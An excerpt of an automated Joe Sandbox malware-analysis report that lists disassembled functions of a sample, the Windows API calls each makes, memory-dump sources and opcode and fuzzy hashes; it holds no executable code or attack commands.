                                                                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: RectWindow
                                                                                  • String ID:
                                                                                  • API String ID: 861336768-0
                                                                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                  APIs
                                                                                  • SendMessageW.USER32 ref: 00449598
                                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                  • _wcslen.LIBCMT ref: 0044960D
                                                                                  • _wcslen.LIBCMT ref: 0044961A
                                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                  • String ID:
                                                                                  • API String ID: 1856069659-0
                                                                                  • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                  • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                  • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                  • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 004478E2
                                                                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                  • TrackPopupMenuEx.USER32(03076380,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorMenuPopupTrack$Proc
                                                                                  • String ID:
                                                                                  • API String ID: 1300944170-0
                                                                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                  • GetCursorPos.USER32(?), ref: 004479D7
                                                                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                  • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1822080540-0
                                                                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                  • String ID:
                                                                                  • API String ID: 659298297-0
                                                                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                  APIs
                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(03071BE8,000000F1,00000000,00000000), ref: 00440E6E
                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(03071BE8,000000F1,00000001,00000000), ref: 00440E9A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnableMessageSend$LongShow
                                                                                  • String ID:
                                                                                  • API String ID: 142311417-0
                                                                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00445879
                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                  • _wcslen.LIBCMT ref: 004458FB
                                                                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3087257052-0
                                                                                  • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                  • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                  APIs
                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 245547762-0
                                                                                  • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                  • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                  • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                  • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                  • BeginPath.GDI32(?), ref: 0044723D
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$Select$BeginCreateDeletePath
                                                                                  • String ID:
                                                                                  • API String ID: 2338827641-0
                                                                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                  • String ID:
                                                                                  • API String ID: 2875609808-0
                                                                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                  • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                  • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                  • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3741023627-0
                                                                                  • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                  • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                  • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                  • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                  • String ID:
                                                                                  • API String ID: 4023252218-0
                                                                                  • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                  • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                  • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                  • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1489400265-0
                                                                                  • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                  • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                  • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                  • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                  APIs
                                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                  • DestroyWindow.USER32(?), ref: 00455728
                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
